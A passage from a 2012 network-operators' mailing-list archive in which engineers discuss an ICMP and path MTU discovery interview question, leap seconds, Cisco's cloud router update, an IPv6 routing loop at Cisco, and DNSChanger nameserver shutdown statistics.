>> talking to a technical person you would realize they were 99% of the way >> there. What if they said "it would cause the generation of port-unreachable >> ICMP packets to cease, and applications may hang until they timeout"? Not >> the answer you're looking for, but not wrong either. > Hi David, > > To clarify: I asked HR to forward me the candidate's answer along with > their resume. Just in case of answers like that one. Which would be > more than enough to proceed to a phone screen directly with me. > > Regards, > Bill > > From george.herbert at gmail.com Thu Jul 5 12:38:28 2012 From: george.herbert at gmail.com (George Herbert) Date: Thu, 5 Jul 2012 10:38:28 -0700 Subject: job screening question In-Reply-To: References: Message-ID: On Jul 5, 2012, at 10:20 AM, Darius Jahandarie wrote: > On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >> Seems fairly straightforward to me. It'll break path MTU discovery. > > Since Bill said "(not IP in general, TCP specifically)", I don't think > PMTUD breaking is what he's looking for. > > I'd venture more along the lines of lack of Destination Unreachables > making things hang. All of DU failing, path MTU discovery, and congestion control / source quench might be the right / expected answer, which makes this a not great question. DU doesn't break TCP per se but would hang sessions until timeout; path MTU isn't a TCP function per se, though it uses TCP as the probe. Source quench is only a small fraction of the TCP congestion control solution space now. My systems consulting company uses a HR prescreen of 20 questions. It took a team of senior consultants and HR some years to tune the questions in. They need to be clear, have unambiguously correct answers, the answer correctness needs to be obvious to the HR / recruiter who isn't technical. I think this one fails to have an unambiguously correct answer and an answer the non-tech recruiter / HR person will understand. So, probably time for a better question... George William Herbert Sent from my iPhone From bill at herrin.us Thu Jul 5 12:41:42 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:41:42 -0400 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 1:20 PM, Darius Jahandarie wrote: > On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >> Seems fairly straightforward to me. It'll break path MTU discovery. > > Since Bill said "(not IP in general, TCP specifically)", I don't think > PMTUD breaking is what he's looking for. No, path MTU discovery is the answer I'm fishing for. The stack notifies TCP of the fragmentation needed message and TCP handles it within the TCP stack. Managing path MTU discovery is specific to each layer-4 protocol even if the trigger message (destination unreachable, fragmentation needed but DF set) is the same. If a candidate gives me a more clever answer, I'd take that too. :-) "This would block all IP traffic." is not a correct answer. It's not even a naively incorrect answer. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From sla at ucolick.org Thu Jul 5 12:42:49 2012 From: sla at ucolick.org (Steve Allen) Date: Thu, 5 Jul 2012 10:42:49 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF5CE3E.6060603@gmail.com> References: <4FF5CE3E.6060603@gmail.com> Message-ID: <20120705174249.GD28857@ucolick.org> On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: > Lets see. There have been nine leap seconds in 20 years. So at the > start of the next century the difference will probably be less than a minute There is no predicting how large the decadal variations in LOD will be, but the difference should be somewhere between 1 minute and 3 minutes. Please see these charts and tables for how unpredictable it is. http://www.ucolick.org/~sla/leapsecs/dutc.html > Remember OpenTime is only for people who want their system clocks to > ignore leap seconds. I don't include myself among the possible users of > OpenTime. Anyone who needs that can already do that using existing, deployed, and tested code and hardware and the GPS system time scale. Please see this worked example. Please do not invent yet another private time scale. http://www.ucolick.org/~sla/leapsecs/right+gps.html -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory--ISB Natural Sciences II, Room 165 Lat +36.99855 1156 High Street Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From derek at derekivey.com Thu Jul 5 12:45:54 2012 From: derek at derekivey.com (Derek Ivey) Date: Thu, 5 Jul 2012 13:45:54 -0400 Subject: job screening question In-Reply-To: References: Message-ID: This is exactly the issue comcast6.net is currently experiencing :). They seem to be blocking ICMP completely and that is causing my HE IPv6 tunnel to be unable to access their site from a browser. On Jul 5, 2012, at 1:41 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 1:20 PM, Darius Jahandarie wrote: >> On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >>> Seems fairly straightforward to me. It'll break path MTU discovery. >> >> Since Bill said "(not IP in general, TCP specifically)", I don't think >> PMTUD breaking is what he's looking for. > > No, path MTU discovery is the answer I'm fishing for. The stack > notifies TCP of the fragmentation needed message and TCP handles it > within the TCP stack. Managing path MTU discovery is specific to each > layer-4 protocol even if the trigger message (destination unreachable, > fragmentation needed but DF set) is the same. > > If a candidate gives me a more clever answer, I'd take that too. :-) > > "This would block all IP traffic." is not a correct answer. It's not > even a naively incorrect answer. > > Regards, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > From owen at delong.com Thu Jul 5 12:42:01 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 10:42:01 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120705170704.GA19613@puck.nether.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> <20120705170704.GA19613@puck.nether.net> Message-ID: <375E4EFB-9C55-406A-8152-BDD683F67516@delong.com> On Jul 5, 2012, at 10:07 AM, Jared Mauch wrote: > On Thu, Jul 05, 2012 at 09:33:05AM -0700, Owen DeLong wrote: >>>> >>> >>> I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. >>> >>> There is a band of latitudes where it does make more sense. >> >> Why punish the rest of us to accommodate a few people who live between about 50? and 55? latitude? > > (easier typing with a real keyboard)... > > This is a local/states rights issue imho :) AZ ignores DST and as a result > I never know what time it is there ;) > > This is a local state-by-state and county-by-county issue as evidenced > by the behavior of counties in Indiana that are close to or within > the Chicago MSA. This is more a social issue than anything else. > > Many people prefer some daylight when they are not working. As do I... Which, if we simply go with PDT all year long, I'd basically have most of the year. I don't get that with standard time during winter anyway and PDT wouldn't help with that. Daylight time does not add length to the daylight period of the day, it merely reduces the time between wake-up and daylight for some portion of winter time. (Standard time has become the anomaly with daylight savings time being practiced for nearly 8 months each year now). I'm fine with leaving all the clocks permanently on daylight time. Just get rid of the twice-a-year timezone shift. I don't care what timezone we pick, just pick one and stick with it. Owen From george.herbert at gmail.com Thu Jul 5 12:46:56 2012 From: george.herbert at gmail.com (George Herbert) Date: Thu, 5 Jul 2012 10:46:56 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: <517F600E-FE6F-442B-8A6E-69A9CA196045@gmail.com> On Jul 5, 2012, at 8:14 AM, Marshall Eubanks wrote: > > And, by the way, the deformations and exchanges of angular momentum > that drive Earth rotation variations are probably the best understood > global geophysical processes there are. Absolutely no magic is > required. Not the tectonic ones. The deeper geophysical ones yes, but tectonics is irregular. We understand the underlying plate segment motions well but they express very irregularly over year-decade scales. George William Herbert Sent from my iPhone From r.engehausen at gmail.com Thu Jul 5 13:02:57 2012 From: r.engehausen at gmail.com (Roy) Date: Thu, 05 Jul 2012 11:02:57 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120705174249.GD28857@ucolick.org> References: <4FF5CE3E.6060603@gmail.com> <20120705174249.GD28857@ucolick.org> Message-ID: <4FF5D6D1.9040303@gmail.com> On 7/5/2012 10:42 AM, Steve Allen wrote: > On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: >> Lets see. There have been nine leap seconds in 20 years. So at the >> start of the next century the difference will probably be less than a minute > There is no predicting how large the decadal variations in LOD will be, > but the difference should be somewhere between 1 minute and 3 minutes. > Please see these charts and tables for how unpredictable it is. > http://www.ucolick.org/~sla/leapsecs/dutc.html > >> Remember OpenTime is only for people who want their system clocks to >> ignore leap seconds. I don't include myself among the possible users of >> OpenTime. > Anyone who needs that can already do that using existing, deployed, > and tested code and hardware and the GPS system time scale. Please > see this worked example. Please do not invent yet another private > time scale. > http://www.ucolick.org/~sla/leapsecs/right+gps.html > > ... So basically the concept of OpenTime is already implemented. All that's needed is a list of Stratum-1 servers that anyone can use. From shortdudey123 at gmail.com Thu Jul 5 13:04:18 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Thu, 5 Jul 2012 13:04:18 -0500 Subject: Cisco Update In-Reply-To: References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> Message-ID: Keep in mind, that to receive the update, the router has to be connected to the internet. So routers that are not connected to the internet by design will be unaffected. -Grant On Thu, Jul 5, 2012 at 11:55 AM, David Hubbard < dhubbard at dino.hostasaurus.com> wrote: > Technical users could always just flash DD-WRT onto the device and replace > the Linksys/Cisco firmware; then you have a much more robust system without > any big brother stuff. > > From tyler.haske at gmail.com Thu Jul 5 13:40:28 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Thu, 5 Jul 2012 14:40:28 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF5D6D1.9040303@gmail.com> References: <4FF5CE3E.6060603@gmail.com> <20120705174249.GD28857@ucolick.org> <4FF5D6D1.9040303@gmail.com> Message-ID: On Thu, Jul 5, 2012 at 2:02 PM, Roy wrote: > On 7/5/2012 10:42 AM, Steve Allen wrote: >> >> On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: >>> >>> Lets see. There have been nine leap seconds in 20 years. So at the >>> start of the next century the difference will probably be less than a >>> minute >> >> There is no predicting how large the decadal variations in LOD will be, >> but the difference should be somewhere between 1 minute and 3 minutes. >> Please see these charts and tables for how unpredictable it is. >> http://www.ucolick.org/~sla/leapsecs/dutc.html >> >>> Remember OpenTime is only for people who want their system clocks to >>> ignore leap seconds. I don't include myself among the possible users of >>> OpenTime. >> >> Anyone who needs that can already do that using existing, deployed, >> and tested code and hardware and the GPS system time scale. Please >> see this worked example. Please do not invent yet another private >> time scale. >> http://www.ucolick.org/~sla/leapsecs/right+gps.html >> >> ... > > > So basically the concept of OpenTime is already implemented. All that's > needed is a list of Stratum-1 servers that anyone can use. >From the website: ----- The scheme described in this web page uses a non-standard NTP server and a non-standard set of "right" zoneinfo files. The hard part is that the zoneinfo files must be hacked for GPS time and recompiled whenever a leap second is announced. Hopefully that recompile happens long before the leap second occurs. In this scheme the kernel does not have to handle the leap second. All of the handling of the leap second happens in the zoneinfo files. This is effectively the same as the bi-annual handling of daylight/summer time transitions. There are no real-time changes. Everything about the changes can be easily tested at any time by any user. ---- Wouldn't an easier way to be separate out the timescales where one is just 84600 seconds a day for the next 100 years, and another can keep accurate time for those that need that kind of accuracy? The POSIX standard can remain unchanged, and time can be monotonic. When the cumulative difference like like 5 minutes, we can have a huge pubic 5 year lead time thing to sync the timescales again. (Kind of like DST, no mater how publicly and how often and how well you tell people, folks will still show up to work late). >From the website again: ---- A system whose time_t is set using an NTP server giving GPS time (thus the kernel does not have to handle leap seconds) and which is configured to use the usual zoneinfo files will produce formatted date/time strings which are 15 seconds larger than official time. (The value 15 will increment at each leap second.) According to the developer forums this is the variation that Google has chosen for Android devices. ---- This seems like a good kludge. But a second is an arbitrary measure. We might as well add leap half seconds, or leap tenths of a second. I'd prefer leap minutes, so we can have these kinds of threads about 1/60th of the time :) Not that I don't find this entertaining. From msa at latt.net Thu Jul 5 13:58:33 2012 From: msa at latt.net (Majdi S. Abbas) Date: Thu, 5 Jul 2012 14:58:33 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120705170704.GA19613@puck.nether.net> References: <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> <20120705170704.GA19613@puck.nether.net> Message-ID: <20120705185832.GA9043@puck.nether.net> On Thu, Jul 05, 2012 at 01:07:04PM -0400, Jared Mauch wrote: > This is a local/states rights issue imho :) AZ ignores DST and as a result > I never know what time it is there ;) AZ actually tried DST for a year, and then came to a couple of conclusions: 1) The state with the highest insolation in the country really has no need to conserve daylight. 2) It actually wastes energy here by driving more business air conditoning use. As for how it actually works: It's very simple. I never touch my clocks unless I'm setting or winding them. It's fantastic. Where this falls down: Outlook will still attempt to scramble your calendar based on other people's silly clock change. Your phone will tell you it's updated the clock for DST...when it hasn't. Or worse, despite being set for no DST change, it'll do it. Some will even lock up. There's lots and lots of broken time of day code out there. People don't understand the distinction between, say, Mountain Standard Time, and Mountain Daylight Time (Equinix, I'm looking at *YOU* -- your MST setting in the portal is not, in fact, MST. There's no option appropriate for me at all.) Everyone keeps asking you what time it is 'there' because they can't wrap their brains around a static -7 offset. Anyway, given the number of software bugs around the DST change, the leap is the least of our worries. Perhaps we should stop rewarding people that write bad code. --msa From jgreco at ns.sol.net Thu Jul 5 13:07:14 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Thu, 5 Jul 2012 13:07:14 -0500 (CDT) Subject: Cisco Update In-Reply-To: Message-ID: <201207051807.q65I7EQo081653@aurora.sol.net> > Technical users could always just flash DD-WRT onto the device and = > replace the Linksys/Cisco firmware; then you have a much more robust = > system without any big brother stuff. Or Cisco could just omit the big brother stuff. This is not a technological failure. In fact, automatic updates of router firmware are overdue. Good job on that front. It is the implications of your router dictating to you what sort of uses might be acceptable and what is not that's troubling, and that seems to have happened on several levels in this product. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From jj at diamondtech.ca Thu Jul 5 14:24:58 2012 From: jj at diamondtech.ca (Jeff Johnstone) Date: Thu, 5 Jul 2012 12:24:58 -0700 Subject: Cisco Update In-Reply-To: <201207051807.q65I7EQo081653@aurora.sol.net> References: <201207051807.q65I7EQo081653@aurora.sol.net> Message-ID: On Thu, Jul 5, 2012 at 11:07 AM, Joe Greco wrote: > > Technical users could always just flash DD-WRT onto the device and = > > replace the Linksys/Cisco firmware; then you have a much more robust = > > system without any big brother stuff. > > Or Cisco could just omit the big brother stuff. > > This is not a technological failure. In fact, automatic updates of > router firmware are overdue. Good job on that front. > > It is the implications of your router dictating to you what sort of > uses might be acceptable and what is not that's troubling, and that > seems to have happened on several levels in this product. > > ... JG > This is what has me thinking about shorting Cisco stock. When the legal implications of this hit the FCC , EFF, or here in Canada the CRTC , the shouts will begin. This breaks all sorts of regulations about privacy and I'm sure a few other product sales laws in the different countries where the products are sold. Interesting times we live in.... cheers Jeff From eugen at leitl.org Thu Jul 5 14:32:00 2012 From: eugen at leitl.org (Eugen Leitl) Date: Thu, 5 Jul 2012 21:32:00 +0200 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF5CE3E.6060603@gmail.com> References: <4FF5CE3E.6060603@gmail.com> Message-ID: <20120705193200.GY12615@leitl.org> On Thu, Jul 05, 2012 at 10:26:22AM -0700, Roy wrote: > Remember OpenTime is only for people who want their system clocks to > ignore leap seconds. I don't include myself among the possible users of > OpenTime. Obviously you need a machine time, which is monotonous, high-resolution (you don't need too many bits even if you resolve down to Planck time and gigayears) and works on any planetary body or in space at any speed, and a human time, which is dynamically derived from machine time, using algorithms depending on particular location and occasion. The sooner we can separate the machine time from people time, the better. From dr at cluenet.de Thu Jul 5 14:39:02 2012 From: dr at cluenet.de (Daniel Roesen) Date: Thu, 5 Jul 2012 21:39:02 +0200 Subject: job screening question In-Reply-To: References: Message-ID: <20120705193902.GB23660@srv03.cluenet.de> On Thu, Jul 05, 2012 at 01:45:54PM -0400, Derek Ivey wrote: > This is exactly the issue comcast6.net is currently experiencing :). > They seem to be blocking ICMP completely and that is causing my HE > IPv6 tunnel to be unable to access their site from a browser. I've recently came across a dualstacked website which fails behind a SixXS tunnel (MTU=1280) but works fine with a native connection (MTU=1500). Having contacted their technical staff, we have diagnosed the issue down to the dualstacked load balancer (pretty well-known brand) SOMETIMES not reacting on ICMPv6 PTB errors. It's not always as easy as "blocks all ICMPv6". For all the cases I've hunted down to root cause in the last decade, it was never a firewall blocking ICMPv6, but most times misbehaving load balancers, either due to bugs or plain not having implemented PMTUD on IPv6. Best regards, Daniel -- CLUE-RIPE -- Jabber: dr at cluenet.de -- dr at IRCnet -- PGP: 0xA85C8AA0 From tnadeau at lucidvision.com Thu Jul 5 14:46:39 2012 From: tnadeau at lucidvision.com (Thomas D Nadeau) Date: Thu, 5 Jul 2012 15:46:39 -0400 Subject: Cisco Update In-Reply-To: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> References: <24E0AC20-73D9-4E53-B5F3-86F46E0A03D5@charterschoolit.com> Message-ID: dd-wrt or openwrt are your friend on those devices. 8) On Jul 5, 2012, at 11:51 AM, Mario Eirea wrote: > Has anyone seen this yet? Looks like Cisco was forcing people to join its Cloud service through an update for it's consumer level routers. > > http://www.neowin.net/news/cisco-locks-users-out-of-their-routers-requires-invasive-cloud-service > > -Mario Eirea From rps at maine.edu Thu Jul 5 14:49:01 2012 From: rps at maine.edu (Ray Soucy) Date: Thu, 5 Jul 2012 15:49:01 -0400 Subject: Cisco Update In-Reply-To: References: <201207051807.q65I7EQo081653@aurora.sol.net> Message-ID: Looks like they've modified their privacy policy in the last few days, but from what I understand it was originally pretty bad, including the collecting users' history and: [...] right to shut down the users' account if it finds that they have used the service for ?obscene, pornographic, or offensive purposes, to infringe another?s rights, including but not limited to any intellectual property rights, or? to violate, or encourage any conduct that would violate any applicable law or regulation or give rise to civil or criminal liability," as well as comply with the orders it receives by "a third party or court of competent jurisdiction" if the user has been found violating those terms. [...] I haven't really kept up on consumer-grade networking; who out there presents a reasonable challenge to Cisco these days? On Thu, Jul 5, 2012 at 3:24 PM, Jeff Johnstone wrote: > On Thu, Jul 5, 2012 at 11:07 AM, Joe Greco wrote: > >> > Technical users could always just flash DD-WRT onto the device and = >> > replace the Linksys/Cisco firmware; then you have a much more robust = >> > system without any big brother stuff. >> >> Or Cisco could just omit the big brother stuff. >> >> This is not a technological failure. In fact, automatic updates of >> router firmware are overdue. Good job on that front. >> >> It is the implications of your router dictating to you what sort of >> uses might be acceptable and what is not that's troubling, and that >> seems to have happened on several levels in this product. >> >> ... JG >> > > This is what has me thinking about shorting Cisco stock. When the legal > implications of this hit the FCC , > EFF, > or here in Canada the CRTC , the shouts will begin. > This breaks all sorts of regulations about privacy and I'm sure a few other > product sales laws in the different countries where the products are sold. > Interesting times we live in.... > > cheers > Jeff -- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From terry.baranski.list at gmail.com Thu Jul 5 15:04:25 2012 From: terry.baranski.list at gmail.com (Terry Baranski) Date: Thu, 5 Jul 2012 16:04:25 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com> On Thu, Jul 5, 2012 at 1:42 PM, William Herrin wrote: > No, path MTU discovery is the answer I'm fishing for. The "TCP specifically" part of the question confused the heck out of me. PMTUD is an IP function in every way as far as I'm concerned. (If you're saying that the way it's actually coded makes it more like a TCP function, I'd still change the wording unless you're hiring people to write network drivers.) -Terry From rps at maine.edu Thu Jul 5 15:40:20 2012 From: rps at maine.edu (Ray Soucy) Date: Thu, 5 Jul 2012 16:40:20 -0400 Subject: job screening question In-Reply-To: References: Message-ID: I think if your goal is to see if they know that your shouldn't blindly filter ICMP for IPv6, and you're specifically looking for knowledge of PMTUD, then a better question would be "Please list the problems that could occur if all ICMPv6 traffic is blocked between two host systems." Which should get you a minimum of neighbor discovery, and up into PMTUD for those who have some knowledge on the subject. If you just say ICMP your answers will be all over the place since blocking of ICMP outright for endpoints is rampant today in the IPv4 world. They might even know the answer but not think of it because of the lack of context. I generally try to stay away from any question that has a definitive answer, as that will only tell you if they happened to read and retain that piece of information somewhere along the way. In my experience, people who have an "OK" understanding of Layer-3, might not always have a good understanding of what happens below that. A better approach might be to have an open ended question that asks them to describe what events will take place for a pair of host systems to communicate in as much detail as they can. If you're asking the question you can leave it intentionally vague and use the questions they ask to evaluate their ability to work through problems; if it needs to be asked by HR then you can narrow it down to include more detail. A good applicant should be able to explain the ARP process at a minimum. If they can't they have no business being in networking in a question like this. I know it sounds trivial, but you'd be surprised how many "experts" I've met who go blank at a question like this. Even more telling than a correct answer is an incorrect answer. I'm always on the look-out for IT people who like to make stuff up; I have no tolerance for that. On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 > -- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From rps at maine.edu Thu Jul 5 15:45:54 2012 From: rps at maine.edu (Ray Soucy) Date: Thu, 5 Jul 2012 16:45:54 -0400 Subject: job screening question In-Reply-To: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com> References: <4ff5f350.87b7e00a.1f02.ffffa840@mx.google.com> Message-ID: He might be thinking of the MMS adjustment as a result of PMTUD, which most people forget about BTW, but I agree: PMTUD isn't about TCP, so tossing TCP in there just makes it a very odd question. On Thu, Jul 5, 2012 at 4:04 PM, Terry Baranski wrote: > On Thu, Jul 5, 2012 at 1:42 PM, William Herrin wrote: > >> No, path MTU discovery is the answer I'm fishing for. > > The "TCP specifically" part of the question confused the heck out of me. > PMTUD is an IP function in every way as far as I'm concerned. (If you're > saying that the way it's actually coded makes it more like a TCP function, > I'd still change the wording unless you're hiring people to write network > drivers.) > > -Terry > > > -- Ray Soucy Epic Communications Specialist Phone: +1 (207) 561-3526 Networkmaine, a Unit of the University of Maine System http://www.networkmaine.net/ From andriy.bilous at gmail.com Thu Jul 5 15:57:34 2012 From: andriy.bilous at gmail.com (Andriy Bilous) Date: Thu, 5 Jul 2012 22:57:34 +0200 Subject: Cisco Update In-Reply-To: References: <201207051807.q65I7EQo081653@aurora.sol.net> Message-ID: I suspect it'll be "Corporations control Internet and our private life" well before tomorrow. Domestic operators do that for ages with their branded routers and AFAIK DOCSIS is unimaginable without (part of) this functionality. I went berzerk when discovered such a checkbox in my home router, two days later I checked it on again and never looked back. How often do I check for firmware upgrades for for my home router? Almost never. Do I backup my config? No. Do I disassemble binary blob before upgrade. No. And I consider myself above-average Internet user. It doesn't really matter how do I brick my hardware and implementing authentication on the vendor site to download the firmware does a better job with gathering sensitive data honestly. Automatic updates is pretty much a common feature these days, it's good to know what it means for a user but is hardly game-breaking. From Derek.Andrew at usask.ca Thu Jul 5 16:05:01 2012 From: Derek.Andrew at usask.ca (Derek Andrew) Date: Thu, 5 Jul 2012 15:05:01 -0600 Subject: job screening question In-Reply-To: References: Message-ID: Isn't MTU discovery on IP and not TCP? On Thu, Jul 5, 2012 at 11:11 AM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. > > I would hope someone applying for an "IP expert" position would know that. > > Could HR be mangling the question or something? > > Oliver > > ------------------------------------- > > Oliver Garraux > Check out my blog: www.GetSimpliciti.com/blog > Follow me on Twitter: twitter.com/olivergarraux > > > On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: > > Hi folks, > > > > I gave my HR folks a screening question to ask candidates for an IP > > expert position. I've gotten some "unexpected" answers, so I want to > > do a sanity check and make sure I'm not asking something unreasonable. > > And by "unexpected" I don't mean naively incorrect answers, I mean > > oh-my-God-how-did-you-get-that-cisco-certification answers. > > > > The question was: > > > > You implement a firewall on which you block all ICMP packets. *What* > > *part of the TCP protocol (not IP in general, TCP specifically)* > > *malfunctions as a result?* > > > > > > My questions for you are: > > > > 1. As an expert who follows NANOG, do you know the answer? Or is this > > question too hard? > > > > 2. Is the question too vague? Is there a clearer way to word it? > > > > 3. Is there a better screening question I could pass to HR to ask and > > check the candidate's response against the supplied answer? > > > > Thanks, > > Bill Herrin > > > > > > -- > > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > > 3005 Crane Dr. ...................... Web: > > Falls Church, VA 22042-3004 > > > > -- Copyright 2012 Derek Andrew (excluding quotations) +1 306 966 4808 ICT University of Saskatchewan Peterson 120; 105 North Road Saskatoon,Saskatchewan,Canada. S7N 4L5 Timezone GMT-6 Typed but not read. [image: Description: Description: Description: Description: Description: cid:image002.png at 01CCD52C.EA7400D0] -- -------------- next part -------------- A non-text attachment was scrubbed... Name: image002.png Type: image/png Size: 7730 bytes Desc: not available URL: From surfer at mauigateway.com Thu Jul 5 16:12:43 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Thu, 5 Jul 2012 14:12:43 -0700 Subject: job screening question Message-ID: <20120705141243.EEE1F71D@resin13.mta.everyone.net> -------------------------------------- Cc: "nanog at nanog.org" Subject: Re: job screening question Date: Thu, 5 Jul 2012 15:05:01 -0600 Isn't MTU discovery on IP and not TCP? -------------------------------------- https://en.wikipedia.org/wiki/Path_MTU_discovery scott From frnkblk at iname.com Thu Jul 5 16:21:12 2012 From: frnkblk at iname.com (Frank Bulk) Date: Thu, 5 Jul 2012 16:21:12 -0500 Subject: cisco.com's IPv6 sites have a routing loop Message-ID: <00c901cd5af4$1a800510$4f800f30$@iname.com> Two of Cisco's IPv6 sites, www-v6.cisco.com and www.ipv6.cisco.com, are in a routing loop: 13 10gigabitethernet11-4.core1.sjc2.he.net (2001:470:0:1b4::1) 84.519 ms 82.710 ms 81.033 ms 14 10gigabitethernet3-2.core1.pao1.he.net (2001:470:0:32::2) 81.821 ms 81.826 ms 83.413 ms 15 ciscosystems.v403.core1.pao1.he.net (2001:470:0:1ee::2) 86.730 ms 86.694 ms 110.206 ms 16 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.269 ms 88.128 ms 88.067 ms 17 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) 111.224 ms 87.687 ms 87.867 ms 18 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.117 ms 87.956 ms 88.234 ms 19 sjck-ispa-gw1-v6-g0-0-2.cisco.com (2001:420:80:6:ca4c:75ff:fe34:7482) 87.879 ms 87.804 ms 103.848 ms 20 sjck-dmzbba-gw1-v6-g1-2.cisco.com (2001:420:80:6:c67d:4fff:fe8b:e2c0) 88.339 ms 88.367 ms 88.574 ms ... noc at cisco.com doesn't work and I can't seem find any of Cisco's NOC-related email addresses in any list that I have. Hopefully someone from Cisco is lurking. Frank Bulk From andrew.fried at gmail.com Thu Jul 5 16:26:08 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Thu, 05 Jul 2012 17:26:08 -0400 Subject: Domain changer statistics by ASN Message-ID: <4FF60670.4010404@gmail.com> As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT). Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal. I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday. if you find this of use, I can regenerate new reports later this afternoon with data from the 5th. Andy -- Andrew Fried andrew.fried at gmail.com -------------- next part -------------- A non-text attachment was scrubbed... Name: dcwg-asns-20120704.txt.bz2 Type: application/x-bzip2 Size: 17851 bytes Desc: not available URL: From EWieling at nyigc.com Thu Jul 5 16:42:01 2012 From: EWieling at nyigc.com (Eric Wieling) Date: Thu, 5 Jul 2012 17:42:01 -0400 Subject: Domain changer statistics by ASN In-Reply-To: <4FF60670.4010404@gmail.com> References: <4FF60670.4010404@gmail.com> Message-ID: A report for a day other than the 4th of July would be very helpful. -----Original Message----- From: Andrew Fried [mailto:andrew.fried at gmail.com] Sent: Thursday, July 05, 2012 5:26 PM To: nanog at nanog.org Subject: Domain changer statistics by ASN As many of you probably know, the replacement nameservers operated on behalf of the FBI for the Domain Changer Working Group (DCWG) are scheduled to go down Sunday morning (GMT). Yesterday, July 4th, was a holiday in the US, and as such the US based activity hitting the DCWG nameservers was uncharacteristically low. The numbers seen in the rest of the world were normal. I'm attaching a report that shows the number of unique ip addresses that were seen hitting the DCWG nameservers from the 4th based on ASN. If you control one of the ASNs seen in the list please remind your folks that these numbers need to come down by Sunday. if you find this of use, I can regenerate new reports later this afternoon with data from the 5th. Andy -- Andrew Fried andrew.fried at gmail.com From andrew.fried at gmail.com Thu Jul 5 16:45:23 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Thu, 05 Jul 2012 17:45:23 -0400 Subject: Domain changer statistics by ASN In-Reply-To: References: <4FF60670.4010404@gmail.com> Message-ID: <4FF60AF3.6020405@gmail.com> We have data going back to November 8, 2011. Generating a report of over 2,000 ASNs, by day, would be too large an attachment for NANOG. 